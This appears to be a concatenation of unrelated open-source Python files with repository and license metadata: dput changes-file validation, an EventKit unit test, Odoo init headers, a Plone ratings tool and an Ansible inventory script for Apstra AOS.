.diff.gz or .debian.tar.gz. All strings in the array will be absolute paths to the files. """ return [os.path.join(self._directory, z['name']) for z in self._data['Files']] def keys(self): return self._data.keys() def __getitem__(self, key): """ Returns the value of the rfc822 key specified. ``key`` Key of data to request. """ return self._data[key] def __contains__(self, key): """ Returns whether the specified RFC822 key exists. ``key`` Key of data to check for existence. """ return key in self._data def get(self, key, default=None): """ Returns the value of the rfc822 key specified, but defaults to a specific value if not found in the rfc822 file. ``key`` Key of data to request. ``default`` Default return value if ``key`` does not exist. """ return self._data.get(key, default) def get_as_string(self, key): """ Returns the value of the rfc822 key specified as the original string. ``key`` Key of data to request. """ return self._data.get_as_string(key) def get_component(self): """ Returns the component of the package. """ return self._parse_section(self._data['Files'][0]['section'])[0] def get_priority(self): """ Returns the priority of the package. """ return self._parse_section(self._data['Files'][0]['priority'])[1] def get_section(self): """ Returns the section of the package. """ return self._parse_section(self._data['Files'][0]['section'])[1] def get_dsc(self): """ Returns the name of the .dsc file. """ for item in self.get_files(): if item.endswith('.dsc'): return item def get_pool_path(self): """ Returns the path the changes file would be """ return self._data.get_pool_path() def get_package_name(self): """ Returns the source package name """ return self.get("Source") def _parse_section(self, section): """ Works out the component and section from the "Section" field. Sections like `python` or `libdevel` are in main. Sections with a prefix, separated with a forward-slash also show the component. It returns a list of strings in the form [component, section]. For example, `non-free/python` has component `non-free` and section `python`. ``section`` Section name to parse. """ if '/' in section: return section.split('/') else: return ['main', section] def set_directory(self, directory): if directory: self._directory = directory else: self._directory = "" def validate(self, check_hash="sha1", check_signature=True): """ See :meth:`validate_checksums` for ``check_hash``, and :meth:`validate_signature` if ``check_signature`` is True. """ self.validate_checksums(check_hash) if check_signature: self.validate_signature(check_signature) else: logger.info("Not checking signature") @tool_required('gpg') def validate_signature(self, check_signature=True): """ Validate the GPG signature of a .changes file. Throws a :class:`dput.exceptions.ChangesFileException` if there's an issue with the GPG signature. Returns the GPG key ID. """ pipe = subprocess.Popen( ["gpg", "--status-fd", "1", "--verify", "--batch", self.get_changes_file()], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE) gpg_output, gpg_output_stderr = pipe.communicate() print(gpg_output) if pipe.returncode != 0: raise ChangesFileException( "Unknown problem while verifying signature") # contains verbose human readable GPG information gpg_output_stderr = str(gpg_output_stderr, encoding='utf8') print(gpg_output_stderr) gpg_output = gpg_output.decode(encoding='UTF-8') if gpg_output.count('[GNUPG:] GOODSIG'): pass elif gpg_output.count('[GNUPG:] BADSIG'): raise ChangesFileException("Bad signature") elif gpg_output.count('[GNUPG:] ERRSIG'): raise ChangesFileException("Error verifying signature") elif gpg_output.count('[GNUPG:] NODATA'): raise ChangesFileException("No signature on") else: raise ChangesFileException( "Unknown problem while verifying signature" ) key = None for line in gpg_output.split("\n"): if line.startswith('[GNUPG:] VALIDSIG'): key = line.split()[2] return key def validate_checksums(self, check_hash="sha1"): """ Validate checksums for a package, using ``check_hack``'s type to validate the package. Valid ``check_hash`` types: * sha1 * sha256 * md5 * md5sum """ logger.debug("validating %s checksums", check_hash) for filename in self.get_files(): if check_hash == "sha1": hash_type = hashlib.sha1() checksums = self.get("Checksums-Sha1") field_name = "sha1" elif check_hash == "sha256": hash_type = hashlib.sha256() checksums = self.get("Checksums-Sha256") field_name = "sha256" elif check_hash == "md5": hash_type = hashlib.md5() checksums = self.get("Files") field_name = "md5sum" changed_files = None # appease pylint for changed_files in checksums: if changed_files['name'] == os.path.basename(filename): break else: assert( "get_files() returns different files than Files: knows?!") with open(os.path.join(self._directory, filename), "rb") as fc: while True: chunk = fc.read(131072) if not chunk: break hash_type.update(chunk) fc.close() if not hash_type.hexdigest() == changed_files[field_name]: raise ChangesFileException( "Checksum mismatch for file %s: %s != %s" % ( filename, hash_type.hexdigest(), changed_files[field_name] )) else: logger.debug("%s Checksum for file %s matches", field_name, filename)
gpl-3.0
venicegeo/eventkit-cloud
eventkit_cloud/utils/tests/test_coordinate_converter.py
1
2036
import json import logging import requests_mock from django.conf import settings from django.test import TestCase, override_settings from eventkit_cloud.utils.geocoding.coordinate_converter import CoordinateConverter logger = logging.getLogger(__name__) mockURL = "http://test.test" @override_settings(GEOCODING_AUTH_URL=None) class TestConvert(TestCase): def setUp(self): self.mock_requests = requests_mock.Mocker() self.mock_requests.start() self.addCleanup(self.mock_requests.stop) settings.CONVERT_API_URL = mockURL def test_convert_success(self): convert_response_success = { "type": "Feature", "geometry": { "type": "Point", "coordinates": [ -112.61869345019069, 50.00105275281522 ] }, "properties": { "name": "12UUA8440", "from": "mgrs", "to": "decdeg" } } self.mock_requests.get(mockURL, text=json.dumps(convert_response_success), status_code=200) convert = CoordinateConverter() result = convert.get("18S TJ 97100 03003") self.assertIsNotNone(result.get("geometry")) self.assertEqual(result.get("type"), "Feature") properties = result.get("properties") geometry = result.get("geometry") self.assertIsInstance(properties, dict) self.assertIsInstance(geometry, dict) self.assertEqual(geometry.get("type"), "Point") self.assertIsInstance(geometry.get("coordinates"), list) def test_convert_fail(self): convert_response_fail = { "properties": { "name": "12UUA844", "from": "mgrs", "to": "decdeg" } } with self.assertRaises(Exception): self.mock_requests.get(mockURL, text=json.dumps(convert_response_fail), status_code=500) CoordinateConverter().get_data()
bsd-3-clause
wangjun/odoo
addons/l10n_de/__init__.py
693
1057
# -*- encoding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
tinkerthaler/odoo
addons/resource/__init__.py
448
1086
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import resource import faces # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
Cenditel/cenditel.comunidades.cynin
products/ATRatings/RatingsTool.py
4
13993
import os, sys import urllib import Globals from AccessControl import ClassSecurityInfo from DateTime import DateTime from OFS.SimpleItem import SimpleItem from Acquisition import aq_base from Products.Archetypes.Referenceable import Referenceable from OFS.PropertyManager import PropertyManager from Products.CMFCore.utils import UniqueObject, getToolByName from Products.CMFPlone.PloneBaseTool import PloneBaseTool from Products.PageTemplates.PageTemplateFile import PageTemplateFile # lazy way of configuring this tool from config import MIN_RATING_VALUE, MAX_RATING_VALUE, STORAGE_CLASS, STORAGE_ARGS, NEUTRAL_RATING_VALUE from Permissions import ADD_RATING_PERMISSION from Products.CMFCore.permissions import ManagePortal from ZODBStorage import HITS_SUMMARY_ID, RATINGS_SUMMARY_ID # ############################################################################## class RatingsTool(PloneBaseTool, UniqueObject, SimpleItem, Referenceable, PropertyManager): """ """ id = 'portal_ratings' meta_type= 'Ratings Tool' # toolicon = 'skins/plone_images/favorite_icon.gif' security = ClassSecurityInfo() isPrincipiaFolderish = 0 storage = None __implements__ = (PloneBaseTool.__implements__, SimpleItem.__implements__, ) manage_options = ( ({'label':'Overview', 'action':'manage_overview'},) + PropertyManager.manage_options + SimpleItem.manage_options) security.declareProtected(ManagePortal, 'manage_overview') manage_overview = PageTemplateFile('www/portal_ratings_manage_overview', globals()) manage_overview.__name__ = 'manage_overview' manage_overview._need__name__ = 0 manage_main = manage_overview _properties = PropertyManager._properties + ( {'id':'allowed_rating_types', 'type': 'lines', 'mode':'w', 'label':'Allowed raing types'}, {'id':'allowed_counting_types', 'type': 'lines', 'mode':'w', 'label':'Allowed hit counting types'}, ) allowed_rating_types = ['Document', 'News Item', 'File', 'Image', 'Link', ] allowed_counting_types = ['Document', 'News Item', 'File', 'Image', 'Link', ] def isRatingAllowedFor(self, content): """ do content allow rating? Add a 'allowRatings' boolean property to the context to enable it""" allowRatings = getattr(content, 'enableRatings', 1) if not allowRatings: return 0 if content.getPortalTypeName() not in self.allowed_rating_types: return 0 return hasattr(aq_base(content), 'UID') def isCountingAllowedFor(self, content): """ do the content allow hit count Add a 'allowCountings' boolean property to the context to enable it""" allowCountings = getattr(content, 'enableCountings', 0) if not allowCountings: return 0 if content.getPortalTypeName() not in self.allowed_counting_types: return 0 return hasattr(aq_base(content), 'UID') security.declarePublic('getCyninRating') def getCyninRating(self,uid): cyninrating = self._getCyninRating(uid) if cyninrating is None: return None else: return cyninrating security.declarePublic('getCyninRatingCount') def getCyninRatingCount(self,uid): return self._getCyninRatingCount(uid) security.declarePublic('getTopRatingsAll') def getTopRatingsAll(self,brains): """ get top n hot contents from catalog brains """ results = [] for brain in brains: value = self._getCyninRating(brain.UID) if value <> None: ratecount = self.getRatingCount(brain.UID) cyninratingcount = self._getCyninRatingCount(brain.UID) results.append( (value, brain, ratecount, cyninratingcount)) def sortlist(x,y): if cmp(y[0],x[0]) != 0: return cmp(y[0],x[0]) else: return cmp(y[2],x[2]) results.sort(lambda x,y:sortlist(x,y)); return results security.declarePublic('getTopRatings') def getTopRatings(self, brains, limit=5): """ get top n hot contents from catalog brains """ results = [] results = self.getTopRatingsAll(brains) return results[:limit] security.declarePublic('getBadRatings') def getBadRatings(self, brains, limit=5): """ get bad ratings from catalog brains """ results = [] for brain in brains: value = self.getRatingMean(brain.UID) if value: results.append((value, brain)) results.sort(lambda x,y:cmp(x[0], y[0])) return results[:limit] security.declarePublic('getTopCountings') def getTopCountings(self, brains, limit=5): """ get top n hot contents from catalog brains """ results = [] for brain in brains: count = self.getHitCount(brain.UID) if count: results.append((count, brain)) results.sort(lambda x,y:cmp(y[0], x[0])) return results[:limit] security.declarePublic('getBadCountings') def getBadCountings(self, brains, limit=5): """ get top n cold contents from catalog brains """ results = [] for brain in brains: count = self.getHitCount(brain.UID) if count: results.append((count, brain)) results.sort(lambda x,y:cmp(x[0], y[0])) return results[:limit] def addRating(self, rating, uid): mt = getToolByName(self, 'portal_membership') if mt.isAnonymousUser(): raise ValueError, 'Anonymous user cannot rate content' # check permission reference_catalog = getToolByName(self, 'reference_catalog') object = reference_catalog.lookupObject(uid) mt.checkPermission(ADD_RATING_PERMISSION, object) member = mt.getAuthenticatedMember() username = member.getUserName() old_rating = self._getUserRating(uid, username) if old_rating is not None: self._deleteRating(uid, username) return self._addRating(rating, uid, username) def getUserRating(self, uid, username=None): if username is None: mt = getToolByName(self, 'portal_membership') if mt.isAnonymousUser(): raise ValueError, 'Anonymous user cannot rate content' member = mt.getAuthenticatedMember() username = member.getUserName() return self._getUserRating(uid, username) def addHit(self, uid): self._getStorage().addHit(uid) # Summary statistics: HITS # hits for individual item def getHitCount(self, uid): return self._getStorage().getHitCount(uid) or 0 # hits for all items def getTotalHitCount(self): return self._getHitsSummary().getCount() def getHitRateTimeInterval(self): return HIT_RATE_TIME_INTERVAL def getHitRate(self, uid): return self._getStorage().getHitRate(uid) # Summary statistics: RATINGS def getMinRating(self): return MIN_RATING_VALUE def getMaxRating(self): return MAX_RATING_VALUE # rating stats for individual items def getRatingCount(self, uid): return self._getStorage().getRatingCount(uid) def getRatingSum(self, uid): return self._getStorage().getSum(uid) def getRatingSumSquared(self, uid): return self._getStorage().getSumSquared(uid) def getRatingMean(self, uid): ratingMean = self._getStorage().getMean(uid) if ratingMean == None: return 0 else: return ratingMean def getRatingStdDev(self, uid): return self._getStorage().getStdDev(uid) def getRatingVariance(self, uid): return self._getStorage().getVariance(uid) # rating stats for all items def getTotalRatingCount(self): """a count of rating means.""" return self._getStorage().getTotalRatingCount() def getRatingMeanCount(self): """a count of rating means.""" return self._getStorage().getRatingMeanCount() def getRatingMeanSum(self): """return a sum of rating means.""" return self._getStorage().getRatingMeanSum() def getRatingMeanSumSquared(self): """a sum of rating means squared.""" return self._getStorage().getRatingMeanSumSquared() def getRatingMeanMean(self): """a mean of rating means.""" return self._getStorage().getRatingMeanMean() def getRatingMeanStdDev(self): """a standard deviation of rating means.""" return self._getStorage().getRatingMeanStdDev() def getRatingMeanVariance(self): """a standard deviation of rating means""" return self._getStorage().getRatingMeanVariance() def getNoiseVariance(self): return self._getStorage().getNoiseVariance() def getEstimatedRating(self, uid): """Use a Bayesian MMSE estimator for DC in white Gaussian noise to estimate the true rating for an item. Motivation: a small number of very positive or very negative ratings can make an item look much better or worse than it actually is. We use a statistical technique to reduce this kind of small number bias. Essentially we assume that true ratings have a Gaussian distribution. Most true ratings are somewhere in the middle, with small numbers very high and small numbers very low. User ratings for an item are the item's true rating + some Gaussian noise. User ratings are mostly close to the true rating, with a few much higher and a few much lower. We estimate a prior distribution of true means and the noise level from all the data. We then use this prior info for the Bayesian estimator. See _Fundamentals of Statistical Signal Processing_, by Alan Kay, pp. 316 - 321 for details. """ priorMean = self.getRatingMeanMean() noiseVariance = self.getNoiseVariance() itemMean = self.getRatingMean(uid) if priorMean is None or noiseVariance is None: # not enough information to compute a prior -- just return the mean if itemMean is None: # no data for computing a mean -- return the middle rating return 0.5 * (float(self.getMinRating()) + float(self.getMaxRating())) return itemMean if itemMean is None: return priorMean priorVariance = self.getRatingMeanVariance() if priorVariance == 0.0 and noiseVariance == 0.0: return itemMean itemRatings = self.getRatingCount(uid) alpha = priorVariance / (priorVariance + noiseVariance/itemRatings) return alpha * itemMean + (1.0 - alpha) * priorMean # private interface def _getStorage(self): if self.storage is None: self.storage = STORAGE_CLASS(**STORAGE_ARGS) return self.storage def _addRating(self, rating, uid, username): # delegate to storage self._getStorage().addRating(rating, uid, username) def _deleteRating(self, uid, username): # delegate to storage self._getStorage().deleteRating(uid, username) def _getUserRating(self, uid, username): # delegate to storage return self._getStorage().getUserRating(uid, username) def _deleteRatingsFor(self, uid): # delegate to storage return self._getStorage().deleteRatingsFor(uid) def _getCyninRating(self,uid): returnvalue = None objRating = self._getStorage()._getObjectRatings(uid,0) if objRating: repository = objRating.repository keyslist = [k for k in repository.keys() if k not in (HITS_SUMMARY_ID,RATINGS_SUMMARY_ID)] if len(keyslist) == 0: returnvalue = None else: returnvalue = 0 for eachkey in keyslist: value = repository.get(eachkey,None) if value and isinstance(value,int): if value == NEUTRAL_RATING_VALUE: self._deleteRating(uid,eachkey) else: returnvalue = returnvalue + (value - NEUTRAL_RATING_VALUE) return returnvalue def _getCyninRatingCount(self,uid): result = {'positive':0,'negative':0,'positivescore':0,'negativescore':0} objRating = self._getStorage()._getObjectRatings(uid,0) if objRating: repository = objRating.repository keyslist = [k for k in repository.keys() if k not in (HITS_SUMMARY_ID,RATINGS_SUMMARY_ID)] for eachkey in keyslist: value = repository.get(eachkey,None) if value and isinstance(value,int): if value > NEUTRAL_RATING_VALUE: result['positive'] = result['positive'] + 1 result['positivescore'] = result['positivescore'] + (value - NEUTRAL_RATING_VALUE) elif value < NEUTRAL_RATING_VALUE: result['negative'] = result['negative'] + 1 result['negativescore'] = result['negativescore'] + (value - NEUTRAL_RATING_VALUE) return result Globals.InitializeClass(RatingsTool)
gpl-3.0
pchauncey/ansible
contrib/inventory/apstra_aos.py
14
20398
#!/usr/bin/env python # # (c) 2017 Apstra Inc, <[email protected]> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # """ Apstra AOS external inventory script ==================================== Ansible has a feature where instead of reading from /etc/ansible/hosts as a text file, it can query external programs to obtain the list of hosts, groups the hosts are in, and even variables to assign to each host. To use this: - copy this file over /etc/ansible/hosts and chmod +x the file. - Copy both files (.py and .ini) in your preferred directory More information about Ansible Dynamic Inventory here http://unix.stackexchange.com/questions/205479/in-ansible-dynamic-inventory-json-can-i-render-hostvars-based-on-the-hostname 2 modes are currently, supported: **device based** or **blueprint based**: - For **Device based**, the list of device is taken from the global device list the serial ID will be used as the inventory_hostname - For **Blueprint based**, the list of device is taken from the given blueprint the Node name will be used as the inventory_hostname Input parameters parameter can be provided using either with the ini file or by using Environment Variables: The following list of Environment Variables are supported: AOS_SERVER, AOS_PORT, AOS_USERNAME, AOS_PASSWORD, AOS_BLUEPRINT The config file takes precedence over the Environment Variables Tested with Apstra AOS 1.1 This script has been inspired by the cobbler.py inventory. thanks Author: Damien Garros (@dgarros) Version: 0.2.0 """ import json import os import re import sys try: import argparse HAS_ARGPARSE = True except ImportError: HAS_ARGPARSE = False try: from apstra.aosom.session import Session HAS_AOS_PYEZ = True except ImportError: HAS_AOS_PYEZ = False from ansible.module_utils.six.moves import configparser """ ## Expected output format in Device mode { "Cumulus": { "hosts": [ "52540073956E", "52540022211A" ], "vars": {} }, "EOS": { "hosts": [ "5254001CAFD8", "525400DDDF72" ], "vars": {} }, "Generic Model": { "hosts": [ "525400E5486D" ], "vars": {} }, "Ubuntu GNU/Linux": { "hosts": [ "525400E5486D" ], "vars": {} }, "VX": { "hosts": [ "52540073956E", "52540022211A" ], "vars": {} }, "_meta": { "hostvars": { "5254001CAFD8": { "agent_start_time": "2017-02-03T00:49:16.000000Z", "ansible_ssh_host": "172.20.52.6", "aos_hcl_model": "Arista_vEOS", "aos_server": "", "aos_version": "AOS_1.1.1_OB.5", "comm_state": "on", "device_start_time": "2017-02-03T00:47:58.454480Z", "domain_name": "", "error_message": "", "fqdn": "localhost", "hostname": "localhost", "hw_model": "vEOS", "hw_version": "", "is_acknowledged": false, "mgmt_ifname": "Management1", "mgmt_ipaddr": "172.20.52.6", "mgmt_macaddr": "52:54:00:1C:AF:D8", "os_arch": "x86_64", "os_family": "EOS", "os_version": "4.16.6M", "os_version_info": { "build": "6M", "major": "4", "minor": "16" }, "serial_number": "5254001CAFD8", "state": "OOS-QUARANTINED", "vendor": "Arista" }, "52540022211A": { "agent_start_time": "2017-02-03T00:45:22.000000Z", "ansible_ssh_host": "172.20.52.7", "aos_hcl_model": "Cumulus_VX", "aos_server": "172.20.52.3", "aos_version": "AOS_1.1.1_OB.5", "comm_state": "on", "device_start_time": "2017-02-03T00:45:11.019189Z", "domain_name": "", "error_message": "", "fqdn": "cumulus", "hostname": "cumulus", "hw_model": "VX", "hw_version": "", "is_acknowledged": false, "mgmt_ifname": "eth0", "mgmt_ipaddr": "172.20.52.7", "mgmt_macaddr": "52:54:00:22:21:1a", "os_arch": "x86_64", "os_family": "Cumulus", "os_version": "3.1.1", "os_version_info": { "build": "1", "major": "3", "minor": "1" }, "serial_number": "52540022211A", "state": "OOS-QUARANTINED", "vendor": "Cumulus" }, "52540073956E": { "agent_start_time": "2017-02-03T00:45:19.000000Z", "ansible_ssh_host": "172.20.52.8", "aos_hcl_model": "Cumulus_VX", "aos_server": "172.20.52.3", "aos_version": "AOS_1.1.1_OB.5", "comm_state": "on", "device_start_time": "2017-02-03T00:45:11.030113Z", "domain_name": "", "error_message": "", "fqdn": "cumulus", "hostname": "cumulus", "hw_model": "VX", "hw_version": "", "is_acknowledged": false, "mgmt_ifname": "eth0", "mgmt_ipaddr": "172.20.52.8", "mgmt_macaddr": "52:54:00:73:95:6e", "os_arch": "x86_64", "os_family": "Cumulus", "os_version": "3.1.1", "os_version_info": { "build": "1", "major": "3", "minor": "1" }, "serial_number": "52540073956E", "state": "OOS-QUARANTINED", "vendor": "Cumulus" }, "525400DDDF72": { "agent_start_time": "2017-02-03T00:49:07.000000Z", "ansible_ssh_host": "172.20.52.5", "aos_hcl_model": "Arista_vEOS", "aos_server": "", "aos_version": "AOS_1.1.1_OB.5", "comm_state": "on", "device_start_time": "2017-02-03T00:47:46.929921Z", "domain_name": "", "error_message": "", "fqdn": "localhost", "hostname": "localhost", "hw_model": "vEOS", "hw_version": "", "is_acknowledged": false, "mgmt_ifname": "Management1", "mgmt_ipaddr": "172.20.52.5", "mgmt_macaddr": "52:54:00:DD:DF:72", "os_arch": "x86_64", "os_family": "EOS", "os_version": "4.16.6M", "os_version_info": { "build": "6M", "major": "4", "minor": "16" }, "serial_number": "525400DDDF72", "state": "OOS-QUARANTINED", "vendor": "Arista" }, "525400E5486D": { "agent_start_time": "2017-02-02T18:44:42.000000Z", "ansible_ssh_host": "172.20.52.4", "aos_hcl_model": "Generic_Server_1RU_1x10G", "aos_server": "172.20.52.3", "aos_version": "AOS_1.1.1_OB.5", "comm_state": "on", "device_start_time": "2017-02-02T21:11:25.188734Z", "domain_name": "", "error_message": "", "fqdn": "localhost", "hostname": "localhost", "hw_model": "Generic Model", "hw_version": "pc-i440fx-trusty", "is_acknowledged": false, "mgmt_ifname": "eth0", "mgmt_ipaddr": "172.20.52.4", "mgmt_macaddr": "52:54:00:e5:48:6d", "os_arch": "x86_64", "os_family": "Ubuntu GNU/Linux", "os_version": "14.04 LTS", "os_version_info": { "build": "", "major": "14", "minor": "04" }, "serial_number": "525400E5486D", "state": "OOS-QUARANTINED", "vendor": "Generic Manufacturer" } } }, "all": { "hosts": [ "5254001CAFD8", "52540073956E", "525400DDDF72", "525400E5486D", "52540022211A" ], "vars": {} }, "vEOS": { "hosts": [ "5254001CAFD8", "525400DDDF72" ], "vars": {} } } """ def fail(msg): sys.stderr.write("%s\n" % msg) sys.exit(1) class AosInventory(object): def __init__(self): """ Main execution path """ if not HAS_AOS_PYEZ: raise Exception('aos-pyez is not installed. Please see details here: https://github.com/Apstra/aos-pyez') if not HAS_ARGPARSE: raise Exception('argparse is not installed. Please install the argparse library or upgrade to python-2.7') # Initialize inventory self.inventory = dict() # A list of groups and the hosts in that group self.inventory['_meta'] = dict() self.inventory['_meta']['hostvars'] = dict() # Read settings and parse CLI arguments self.read_settings() self.parse_cli_args() # ---------------------------------------------------- # Open session to AOS # ---------------------------------------------------- aos = Session(server=self.aos_server, port=self.aos_server_port, user=self.aos_username, passwd=self.aos_password) aos.login() # Save session information in variables of group all self.add_var_to_group('all', 'aos_session', aos.session) # Add the AOS server itself in the inventory self.add_host_to_group("all", 'aos') self.add_var_to_host("aos", "ansible_ssh_host", self.aos_server) self.add_var_to_host("aos", "ansible_ssh_pass", self.aos_password) self.add_var_to_host("aos", "ansible_ssh_user", self.aos_username) # ---------------------------------------------------- # Build the inventory # 2 modes are supported: device based or blueprint based # - For device based, the list of device is taken from the global device list # the serial ID will be used as the inventory_hostname # - For Blueprint based, the list of device is taken from the given blueprint # the Node name will be used as the inventory_hostname # ---------------------------------------------------- if self.aos_blueprint: bp = aos.Blueprints[self.aos_blueprint] if bp.exists is False: fail("Unable to find the Blueprint: %s" % self.aos_blueprint) for dev_name, dev_id in bp.params['devices'].value.items(): self.add_host_to_group('all', dev_name) device = aos.Devices.find(uid=dev_id) if 'facts' in device.value.keys(): self.add_device_facts_to_var(dev_name, device) # Define admin State and Status if 'user_config' in device.value.keys(): if 'admin_state' in device.value['user_config'].keys(): self.add_var_to_host(dev_name, 'admin_state', device.value['user_config']['admin_state']) self.add_device_status_to_var(dev_name, device) # Go over the contents data structure for node in bp.contents['system']['nodes']: if node['display_name'] == dev_name: self.add_host_to_group(node['role'], dev_name) # Check for additional attribute to import attributes_to_import = [ 'loopback_ip', 'asn', 'role', 'position', ] for attr in attributes_to_import: if attr in node.keys(): self.add_var_to_host(dev_name, attr, node[attr]) # if blueprint_interface is enabled in the configuration # Collect links information if self.aos_blueprint_int: interfaces = dict() for link in bp.contents['system']['links']: # each link has 2 sides [0,1], and it's unknown which one match this device # at first we assume, first side match(0) and peer is (1) peer_id = 1 for side in link['endpoints']: if side['display_name'] == dev_name: # import local information first int_name = side['interface'] # init dict interfaces[int_name] = dict() if 'ip' in side.keys(): interfaces[int_name]['ip'] = side['ip'] if 'interface' in side.keys(): interfaces[int_name]['name'] = side['interface'] if 'display_name' in link['endpoints'][peer_id].keys(): interfaces[int_name]['peer'] = link['endpoints'][peer_id]['display_name'] if 'ip' in link['endpoints'][peer_id].keys(): interfaces[int_name]['peer_ip'] = link['endpoints'][peer_id]['ip'] if 'type' in link['endpoints'][peer_id].keys(): interfaces[int_name]['peer_type'] = link['endpoints'][peer_id]['type'] else: # if we haven't match the first time, prepare the peer_id # for the second loop iteration peer_id = 0 self.add_var_to_host(dev_name, 'interfaces', interfaces) else: for device in aos.Devices: # If not reacheable, create by key and # If reacheable, create by hostname self.add_host_to_group('all', device.name) # populate information for this host self.add_device_status_to_var(device.name, device) if 'user_config' in device.value.keys(): for key, value in device.value['user_config'].items(): self.add_var_to_host(device.name, key, value) # Based on device status online|offline, collect facts as well if device.value['status']['comm_state'] == 'on': if 'facts' in device.value.keys(): self.add_device_facts_to_var(device.name, device) # Check if device is associated with a blueprint # if it's create a new group if 'blueprint_active' in device.value['status'].keys(): if 'blueprint_id' in device.value['status'].keys(): bp = aos.Blueprints.find(uid=device.value['status']['blueprint_id']) if bp: self.add_host_to_group(bp.name, device.name) # ---------------------------------------------------- # Convert the inventory and return a JSON String # ---------------------------------------------------- data_to_print = "" data_to_print += self.json_format_dict(self.inventory, True) print(data_to_print) def read_settings(self): """ Reads the settings from the apstra_aos.ini file """ config = configparser.ConfigParser() config.read(os.path.dirname(os.path.realpath(__file__)) + '/apstra_aos.ini') # Default Values self.aos_blueprint = False self.aos_blueprint_int = True self.aos_username = 'admin' self.aos_password = 'admin' self.aos_server_port = 8888 # Try to reach all parameters from File, if not available try from ENV try: self.aos_server = config.get('aos', 'aos_server') except: if 'AOS_SERVER' in os.environ.keys(): self.aos_server = os.environ['AOS_SERVER'] try: self.aos_server_port = config.get('aos', 'port') except: if 'AOS_PORT' in os.environ.keys(): self.aos_server_port = os.environ['AOS_PORT'] try: self.aos_username = config.get('aos', 'username') except: if 'AOS_USERNAME' in os.environ.keys(): self.aos_username = os.environ['AOS_USERNAME'] try: self.aos_password = config.get('aos', 'password') except: if 'AOS_PASSWORD' in os.environ.keys(): self.aos_password = os.environ['AOS_PASSWORD'] try: self.aos_blueprint = config.get('aos', 'blueprint') except: if 'AOS_BLUEPRINT' in os.environ.keys(): self.aos_blueprint = os.environ['AOS_BLUEPRINT'] try: if config.get('aos', 'blueprint_interface') in ['false', 'no']: self.aos_blueprint_int = False except: pass def parse_cli_args(self): """ Command line argument processing """ parser = argparse.ArgumentParser(description='Produce an Ansible Inventory file based on Apstra AOS') parser.add_argument('--list', action='store_true', default=True, help='List instances (default: True)') parser.add_argument('--host', action='store', help='Get all the variables about a specific instance') self.args = parser.parse_args() def json_format_dict(self, data, pretty=False): """ Converts a dict to a JSON object and dumps it as a formatted string """ if pretty: return json.dumps(data, sort_keys=True, indent=2) else: return json.dumps(data) def add_host_to_group(self, group, host): # Cleanup group name first clean_group = self.cleanup_group_name(group) # Check if the group exist, if not initialize it if clean_group not in self.inventory.keys(): self.inventory[clean_group] = {} self.inventory[clean_group]['hosts'] = [] self.inventory[clean_group]['vars'] = {} self.inventory[clean_group]['hosts'].append(host) def add_var_to_host(self, host, var, value): # Check if the host exist, if not initialize it if host not in self.inventory['_meta']['hostvars'].keys(): self.inventory['_meta']['hostvars'][host] = {} self.inventory['_meta']['hostvars'][host][var] = value def add_var_to_group(self, group, var, value): # Cleanup group name first clean_group = self.cleanup_group_name(group) # Check if the group exist, if not initialize it if clean_group not in self.inventory.keys(): self.inventory[clean_group] = {} self.inventory[clean_group]['hosts'] = [] self.inventory[clean_group]['vars'] = {} self.inventory[clean_group]['vars'][var] = value def add_device_facts_to_var(self, device_name, device): # Populate variables for this host self.add_var_to_host(device_name, 'ansible_ssh_host', device.value['facts']['mgmt_ipaddr']) self.add_var_to_host(device_name, 'id', device.id) # self.add_host_to_group('all', device.name) for key, value in device.value['facts'].items(): self.add_var_to_host(device_name, key, value) if key == 'os_family': self.add_host_to_group(value, device_name) elif key == 'hw_model': self.add_host_to_group(value, device_name) def cleanup_group_name(self, group_name): """ Clean up group name by : - Replacing all non-alphanumeric caracter by underscore - Converting to lowercase """ rx = re.compile('\W+') clean_group = rx.sub('_', group_name).lower() return clean_group def add_device_status_to_var(self, device_name, device): if 'status' in device.value.keys(): for key, value in device.value['status'].items(): self.add_var_to_host(device.name, key, value) # Run the script if __name__ == '__main__': AosInventory()
gpl-3.0
alephu5/Soundbyte
environment/lib/python3.3/site-packages/numpy/lib/__init__.py
16
1122
